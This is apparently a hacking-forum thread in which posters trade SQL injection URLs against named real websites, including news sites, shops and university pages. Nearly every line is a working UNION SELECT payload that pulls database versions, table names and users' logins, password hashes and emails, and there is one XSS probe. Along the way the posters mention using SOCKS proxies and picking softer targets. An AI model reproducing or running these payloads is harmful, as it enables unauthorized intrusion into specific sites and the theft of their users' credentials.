I love it when everything is this neat) Code: http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(table_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(column_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name="SiteUser"/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(concat(user_id,char(58),user_login,char(58),user_pass,char(58),user_name),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+SiteUser/*
Having recovered a bit from the shock, I'll continue my thankless work =( Code: http://sex.dp.ua/topic.php?categor=-1+union+select+1,concat(login,char(58),password),3,4+from+users+limit+0,1/*
Code: http://www.imhoclub.ru/books/?did=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/* Code: http://www.ugweekend.ru/index.php?mag=07&nid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/* Code: http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),char(58),version()),char),9,10,11/* http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(email,char),9,10,11+from+author/*
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMATION_SCHEMA.TABLES-- but no idea how to iterate through them
mssql Code: http://www.opentext.com/news/pr.html?id=1772+or+1772=@@version-- Code: http://www.sumtotalsystems.com/success/login_global.html?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+regusers/*
Code: http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+users+limit+0,1/* 6 users, look in the title. Looks like md5. upd:// Code: http://www.yuldash.com/tg/index.php?id=-1+union+select+version(),2,3,4,5,6,7/*&q=mes&pp=7
Started using SOCKS proxies and began making up for lost time: Code: http://pravoslavie.info/stat.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/* ____ Code: http://www.cinefantastico.com/filmct.php?id=-1+union+select+1,2,3/* ____ Softholm.com - 2500 visitors per day Code: http://www.softholm.com/php/dd.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/* ___
Code: http://www.cipmarseille.com/evenement_fiche.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/* That's it, I'm off to sleep)
Never did manage to guess the users table( Code: http://www.yukka.ru/detail.php?id=7&pid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Didn't find the tables Code: http://www.lygus.lt./ITC/news.php?id=-1+union+select+1,user(),3,version(),database()/*
http://www.allaboutjazz.com/ Code: http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,version(),39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/* http://www.caiguoqiang.com/ Code: http://www.caiguoqiang.com/project_detail.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25/* Once again the first SQL injection... I hope nobody has posted these already?)
http://www.tomkeays.com/morris/faq/?mid=380000000%20union%20select%201,email,password,4,5,6,7,8,9,10,11,12,13,14%20from%20user/* http://www.tomkeays.com/morris/faq/?srch=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
Code: http://www.losingtoday.com/tales.php?id=-1+union+select+1,2,3,version(),5,6/* ___ 193 columns, insane: Code: http://shapes.aim-at-shape.net/view.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193/*
Code: http://career.coe.missouri.edu/index.php?page=-1+union+select+1,2,convert(USER()+using+latin1),4,5,6,7,8,9,0,1/*
Moving on to something safer, shops for example =) Code: http://best4her.net/shop.php?goods=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12/* Here's another one, same trouble =( Version 4, went through about 30 names and nothing =(. Code: http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*